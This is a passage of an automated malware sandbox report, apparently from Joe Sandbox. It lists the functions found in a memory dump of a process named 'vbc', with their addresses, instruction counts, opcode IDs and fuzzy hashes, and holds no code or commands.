                            • String ID:
                            • API String ID:
                            • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                            • Instruction ID: dd3bab1f72db684fff4b102a3302cf68663bd6e5fb2866e4bda86cb29ce16782
                            • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                            • Instruction Fuzzy Hash: F251F2766042129BCB21EF64AC44A7BB7F6FF84248F040869F946C7251EB35D856C7F2
                            Function 051895DA Relevance: .2, Instructions: 160COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5b140f8092240c88d7fb608ebd5e1e0146def1430d3e1b4ea48190732711671
                            • Instruction ID: 5c95558c1d91039c573a28cc0c21b898a072895a8df0622e289d1eb699894988
                            • Opcode Fuzzy Hash: b5b140f8092240c88d7fb608ebd5e1e0146def1430d3e1b4ea48190732711671
                            • Instruction Fuzzy Hash: C1518D75A00248ABEB32AFA4CC85BFDBBB5FF01300F60096EE595A7191DB729944DF14
                            Function 05173740 Relevance: .2, Instructions: 159COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7bf7c83a92ac851db9fc5703db3f3282db0f7d7347c847344eeb272ab8f662d
                            • Instruction ID: 6a84045d7f493c135e74c418efb2eae5133a722414d3b6823cfd9b70afca95dc
                            • Opcode Fuzzy Hash: b7bf7c83a92ac851db9fc5703db3f3282db0f7d7347c847344eeb272ab8f662d
                            • Instruction Fuzzy Hash: 3F515575A0061AAFC325CF6CC484BA9B7B1FF04710F158AA9E865CB340E734E992DBC0
                            Function 0519E443 Relevance: .2, Instructions: 158COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ed469e4119f6a36e44ff23fae6f728cc3ccb447cb7e94036af92df804e57a56e
                            • Instruction ID: d72eabb28e886c9e4b470198494cf787c856f66bbc8aa9b3116cafeea03f9ba9
                            • Opcode Fuzzy Hash: ed469e4119f6a36e44ff23fae6f728cc3ccb447cb7e94036af92df804e57a56e
                            • Instruction Fuzzy Hash: F7518C71200A08DFDB26EF68C984EAAB3FEFF04750F51092AE51697661D730ED41CB61
                            Function 05167152 Relevance: .2, Instructions: 158COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d9135dad387798f3da7d5043b37774f89ec65143f4f9511635e01e811996a282
                            • Instruction ID: a8de60e884d57a4479a45f0faeb0ef931d27a2806c0534fc45a194bb5b090251
                            • Opcode Fuzzy Hash: d9135dad387798f3da7d5043b37774f89ec65143f4f9511635e01e811996a282
                            • Instruction Fuzzy Hash: 2651F131A44605EFEB19EF64C948BBDBBB6FF14319F1040AAE513932D0DB749921CB80
                            Function 051845B1 Relevance: .2, Instructions: 156COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                            • Instruction ID: 51b957c82e9f1ef4a8931a98e6313e131f2e4699c6084a4d9abebafc5fc0fac0
                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                            • Instruction Fuzzy Hash: E151AF71E0461AABCF26EF94C444BFEBBB5AF44754F05406AE901AB240DB74D944CFA0
                            Function 051651ED Relevance: .1, Instructions: 149COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: be867db1ebea5ecfca51919caf80cf4d8f4402b4c52afec3f914cb8fa494b7af
                            • Instruction ID: 15a7782bc001a7c70a1d9f45f346bb969f597a5b53e554d037a96883cd3c9978
                            • Opcode Fuzzy Hash: be867db1ebea5ecfca51919caf80cf4d8f4402b4c52afec3f914cb8fa494b7af
                            • Instruction Fuzzy Hash: A1518B31B05315DBDF25DBA8D848FEDB7B6BF08B14F920058E842EB251D7B5A960CB60
                            Function 0519F71F Relevance: .1, Instructions: 143COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32c7fa72dc4fa4b26b20b13d0634ea4a183612e80c235c4662c6451e22e01347
                            • Instruction ID: 4dfafc1d71ba212c0aef47f1606ae4cb8fab95ac3094b9cc942d424d014199f3
                            • Opcode Fuzzy Hash: 32c7fa72dc4fa4b26b20b13d0634ea4a183612e80c235c4662c6451e22e01347
                            • Instruction Fuzzy Hash: 5F417977D04229ABCB2AEBA89884ABFBABDAF04654F050566E901E7201D735DD01C7E1
                            Function 052335D7 Relevance: .1, Instructions: 139COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                            • Instruction ID: eca9d54c5da485fa4bf78d36c3e0cc8082f35dde9039f8a024151d1f1e3bb16a
                            • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                            • Instruction Fuzzy Hash: 74517CB1610606EFCB15CF14C581A66FBB6FF55304F1585BAE8089F222E771EA86CF90
                            Function 0519A430 Relevance: .1, Instructions: 139COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5c4e961fe601bec2117b127891a55b04b4d82dba0ef227fb6dcce5dbe6c4768d
                            • Instruction ID: a3328c8013af4bf55ec0cddfdd7c309ee3c87278524fb9120ed6985cc54159d0
                            • Opcode Fuzzy Hash: 5c4e961fe601bec2117b127891a55b04b4d82dba0ef227fb6dcce5dbe6c4768d
                            • Instruction Fuzzy Hash: F241F671754301EBDF2DEE68A889F6ABB66EF45704F410028FD06DB281EB719C84C7A1
                            Function 0516D534 Relevance: .1, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6e199d657135d0587e2ded14cf70ee03cb455e553e6f731909e7741b3e409e28
                            • Instruction ID: 3400494d3186628b0246870ccf81f2901da5e27eeaf982e28201169ff3e2da7b
                            • Opcode Fuzzy Hash: 6e199d657135d0587e2ded14cf70ee03cb455e553e6f731909e7741b3e409e28
                            • Instruction Fuzzy Hash: E551DF32308691CFC725CB18D444F6AB7F6BB44B54F0A48A9F8128BB91D739DC50CB62
                            Function 051901F8 Relevance: .1, Instructions: 138COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8eb73082833616b143ec5789452b3d367d0b927e459538c24595bb66eb45d73c
                            • Instruction ID: 54de1acf44f1bd8745c90a0586c76baed7fed4b77537eb0fa00eca53cf91ce96
                            • Opcode Fuzzy Hash: 8eb73082833616b143ec5789452b3d367d0b927e459538c24595bb66eb45d73c
                            • Instruction Fuzzy Hash: FE418A36A042199BCF28DF98C448AEEF7B5BF4C710F15816AE816E7250E735AD41CBA4
                            Function 051A2750 Relevance: .1, Instructions: 137COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction ID: 45c1bead85c0f298ca8dd5beaeb0ae103d140baa5053e1fe91766d7ec66f7eaa
                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                            • Instruction Fuzzy Hash: 79514A75A00615DFCB15CF98C580ABEF7B2FF84724F2881A9D815A7350D730AE42CBA0
                            Function 051DD1C0 Relevance: .1, Instructions: 135COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                            • Instruction ID: efef04da10d61466dfdd94a5c45c4bb08f21e5114f249067e975184f1514eeff
                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                            • Instruction Fuzzy Hash: 56512971A04205DFCB18CFA9D481AA9FBF1FF48314B14856ED81A97345D734EA80CFA0
                            Function 05166154 Relevance: .1, Instructions: 133COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2f7f8b69a0bd647419af1f3350023fc4f21deb9a733629f934b1001d5dfb003a
                            • Instruction ID: da0c0bbe270b8ef54b891a04339ed32ab94251f923377e7c9ac64a33bfed84f7
                            • Opcode Fuzzy Hash: 2f7f8b69a0bd647419af1f3350023fc4f21deb9a733629f934b1001d5dfb003a
                            • Instruction Fuzzy Hash: E4511770A04256DBDB25CB28CC08BF8BBB6FF05314F1482E9D429976D1DB35A991CF40
                            Function 0515B136 Relevance: .1, Instructions: 131COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f1f54982964575f6957189fef8dc10e488850cc0978f16ddd3b5cba81ab0824c
                            • Instruction ID: 8296737d0d9d01876495602f63e6761180f8154859ba96e2d368824199d3c2a9
                            • Opcode Fuzzy Hash: f1f54982964575f6957189fef8dc10e488850cc0978f16ddd3b5cba81ab0824c
                            • Instruction Fuzzy Hash: E441D371644605EFDB25EF64C844B6ABBFAFF40764F414429E922CB291D7B4EC40CBA0
                            Function 0522866E Relevance: .1, Instructions: 129COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                            • Instruction ID: 3b4efb25e5e0c798e975442047bf4c430db89f1dd1766ebb5b9a2c3650d63619
                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                            • Instruction Fuzzy Hash: 16418179B24225BBDB15DF99CC84ABFB7BABF88600F148069E805A7341DB74DE418760
                            Function 0518A470 Relevance: .1, Instructions: 127COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b30b63a17e1e396d097b38ddbe0d0869e415d2a058730f8581fc0690689b5ada
                            • Instruction ID: 5eb4da0b7b1a93c504cec15f321b5ea56eb6f20adcc18c9491687900c55956ac
                            • Opcode Fuzzy Hash: b30b63a17e1e396d097b38ddbe0d0869e415d2a058730f8581fc0690689b5ada
                            • Instruction Fuzzy Hash: 52419E32A44204CFCF25EF68D499BB9BBB5FF14320F55019AE412AB291DB359985CFA0
                            Function 0518D6E0 Relevance: .1, Instructions: 126COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 162da04a1dd0a13f0b7a09d1a49ceda3f403effc6f112940d44aa0dea717f52c
                            • Instruction ID: 9fe87a25beef8ecaab344dbdc099c48a63dbe8287291cfad7745782a6ab0cc29
                            • Opcode Fuzzy Hash: 162da04a1dd0a13f0b7a09d1a49ceda3f403effc6f112940d44aa0dea717f52c
                            • Instruction Fuzzy Hash: 6241C3762143409FC734FF24D898E6ABBAAEF55720F00466DF81647292DB30E852CBD1
                            Function 0515A020 Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                            • Instruction ID: 2804638ded0155269d8763b3f7c9704153448a93dd2233980c9fc6eea19730e3
                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                            • Instruction Fuzzy Hash: 2F412931B08211DBEB24DE55C454BFAB762FF40736F16816EEC558B640D7798D80CB90
                            Function 05190710 Relevance: .1, Instructions: 121COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                            • Instruction ID: d8a9b32ac2b12fb27bc34a26e54b12d81e0372f1f411057dd32c1906c9b7c1a6
                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                            • Instruction Fuzzy Hash: 65414975A04705EFCB28DF98C988AAAB7F5FF08710B11496DE596D7690D330EA44CF90
                            Function 0516262C Relevance: .1, Instructions: 119COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c088c2f05447d5e084aa9cbcb5f94908796eb87414e124076e951dffe12509f
                            • Instruction ID: 53795e6362a8bffc450d7f4301b244a8df218d123b451519e5a4861cb7336bb6
                            • Opcode Fuzzy Hash: 6c088c2f05447d5e084aa9cbcb5f94908796eb87414e124076e951dffe12509f
                            • Instruction Fuzzy Hash: 7641E679A01704CFC725EF24D944F69B7F2FF44324F1182A9D8269B6A1DB70A981CF51
                            Function 051E07C3 Relevance: .1, Instructions: 114COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 015559d5d7c9b895944fc90de62a992366a60c5941ddd7840115f898183af7ff
                            • Instruction ID: 58566ba3daff1bbbeb91fc25ae1dc8b27fe9a534525b4e97b0e0ab03131cc480
                            • Opcode Fuzzy Hash: 015559d5d7c9b895944fc90de62a992366a60c5941ddd7840115f898183af7ff
                            • Instruction Fuzzy Hash: 55416072A14344AFD720DF24C849F9BFBE8FF88654F004A2AF59897251D7709944CB92
                            Function 051E05A7 Relevance: .1, Instructions: 111COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 45b0bef0a64e04c18165598054c8519621ce15736084702b99047bd23d1c8a29
                            • Instruction ID: 63a3e863b14dab891d87c0787b875ba1d5625d79219889d011632892d45be5df
                            • Opcode Fuzzy Hash: 45b0bef0a64e04c18165598054c8519621ce15736084702b99047bd23d1c8a29
                            • Instruction Fuzzy Hash: B641C072608A459FC321DF69C848B6AB3E9BFCD700F040A2DF89597680E770E905C7A6
                            Function 05165702 Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c262ad8542c0dbb77f86abda360f7e2b2c1df0082e9501d1db91dfc1f6832682
                            • Instruction ID: f5ba65183adbe5a6a6a18cb03f320e9cc96d879788c0897c5a7bea7d90acb775
                            • Opcode Fuzzy Hash: c262ad8542c0dbb77f86abda360f7e2b2c1df0082e9501d1db91dfc1f6832682
                            • Instruction Fuzzy Hash: C031CE31701A06EFCB65EB24C988EA9FBA7FF48714F814069E90147A91DB70E830CBD1
                            Function 051850E4 Relevance: .1, Instructions: 101COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                            • Instruction ID: 87b3ea86d9e3917e8f6eea9ab5c7855ac73ee6c29212a3ce05f89e48fc9d1292
                            • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                            • Instruction Fuzzy Hash: 1F31263170C241ABD731EA18C800B77B7E7FB85790F4A856AF485CB281E374D841CBA2
                            Function 0515B480 Relevance: .1, Instructions: 100COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ac8f3f13cb3c87f259046cebb0428e5d507d04fcaec9dae7a7be6df18a6f20be
                            • Instruction ID: 5b36448b9368d47df336c4e0b09ea240e754bfc453a90fd93d4c80751a5f0632
                            • Opcode Fuzzy Hash: ac8f3f13cb3c87f259046cebb0428e5d507d04fcaec9dae7a7be6df18a6f20be
                            • Instruction Fuzzy Hash: 10310272615204EFC725DF18C884A6AB7A6FF44360F154669FC668B291DB31ED42CBD0
                            Function 052261C3 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b1a7e5e57efa847b28fcbf632bbdf0148530e327f75f33bed0082095ed0a768a
                            • Instruction ID: 6403b623329f6f59acdd60a78dba64458cf8fbb9704a8b6264afcd7401f6263e
                            • Opcode Fuzzy Hash: b1a7e5e57efa847b28fcbf632bbdf0148530e327f75f33bed0082095ed0a768a
                            • Instruction Fuzzy Hash: A431D27AA1026ABBDB15DF98CC44FAEB7B5FF44740F514268E505AB244DBB0BD00CBA4
                            Function 051607AF Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ead35bef9207091ee543b9f425246178525fa79b51d5e772b3ee44e1be56d39f
                            • Instruction ID: ceb84086bc085b8e5fe65a3470e039f96e0fe7895c8fc31d690cd82e5707a5ea
                            • Opcode Fuzzy Hash: ead35bef9207091ee543b9f425246178525fa79b51d5e772b3ee44e1be56d39f
                            • Instruction Fuzzy Hash: FA31C532F05711DBC726DE248888EBBBBAAEF98660F024929FC5597315DB30DC2187D1
                            Function 052260B8 Relevance: .1, Instructions: 95COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 85127a39f5122e493351d8199da7a8bd4f201fefb878f73134be4f063c249e1b
                            • Instruction ID: 93083a28c1652bcb2b60f872a73afa77bec78ebed2a886b35ddd2f6a4094ef63
                            • Opcode Fuzzy Hash: 85127a39f5122e493351d8199da7a8bd4f201fefb878f73134be4f063c249e1b
                            • Instruction Fuzzy Hash: 1931E23AB20226BBDB22DFA9C840B6EB7BAAF44754F100069E505DB351DF70FD018B90
                            Function 05168550 Relevance: .1, Instructions: 94COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6635564a0440ca03e397c6a212d53a154453cfd4418968a3bd162dc4b1b43f53
                            • Instruction ID: 5d32254edbe4b35bd33ffa3a6c0115c65943f34f3e79818adf1fe2f3f640672c
                            • Opcode Fuzzy Hash: 6635564a0440ca03e397c6a212d53a154453cfd4418968a3bd162dc4b1b43f53
                            • Instruction Fuzzy Hash: 20318AB56093019FD324CF19C840B2AFBE5FB98B10F0549AEE89A9B351D7B1E854CB91
                            Function 0515D6AA Relevance: .1, Instructions: 93COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                            • Instruction ID: 34cecd1c7c32a7990acb9f3c72027079c8daf925b426801af4f2b1383873459a
                            • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                            • Instruction Fuzzy Hash: 0131D936601204EFDB21EE68D880F6EB3B9EF80764F168428ED259B215D370DE40CB90
                            Function 051657C0 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf5536d3257da07c489bd33edaa353831fddd7d5687fb71487585f97eee02b14
                            • Instruction ID: 957f6bc988a3cddfe7f3bd29b4774ca564421341896cc81153ce100d616f3d84
                            • Opcode Fuzzy Hash: cf5536d3257da07c489bd33edaa353831fddd7d5687fb71487585f97eee02b14
                            • Instruction Fuzzy Hash: 5231AE35B15A06FFDB55EB24DA48EA9BBA7FF48210F859069E80187F51D731E830CB81
                            Function 0519A6C7 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                            • Instruction ID: fc5f00bff452ed1eafda162510ee2f3467f5055a75d891b795d1e47ef39ae235
                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                            • Instruction Fuzzy Hash: C4313C76B04B00AFDB68DF69DD41B57B7F9BF08A50F04092DA59AC3651E731E904CB60
                            Function 051B7190 Relevance: .1, Instructions: 89COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5130000_vbc.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                            • Instruction ID: e6e38503157075907d54269f7ecd44ef4ad126e2a9dcca878570bcbebf6b674d
                            • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                            • Instruction Fuzzy Hash: BD317A75608206CFCB10CF18C480996FBF6FF99310B2585A9E9599B395E730ED06CB91
                            Function 0515E420 Relevance: .1, Instructions: 88COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000003.00000002.1580691606.0000000005130000.00000040.00001000.00020000.00000000.sdmp, Offset: 05130000, based on PE: true
                            Joe Sandbox IDA Plugin
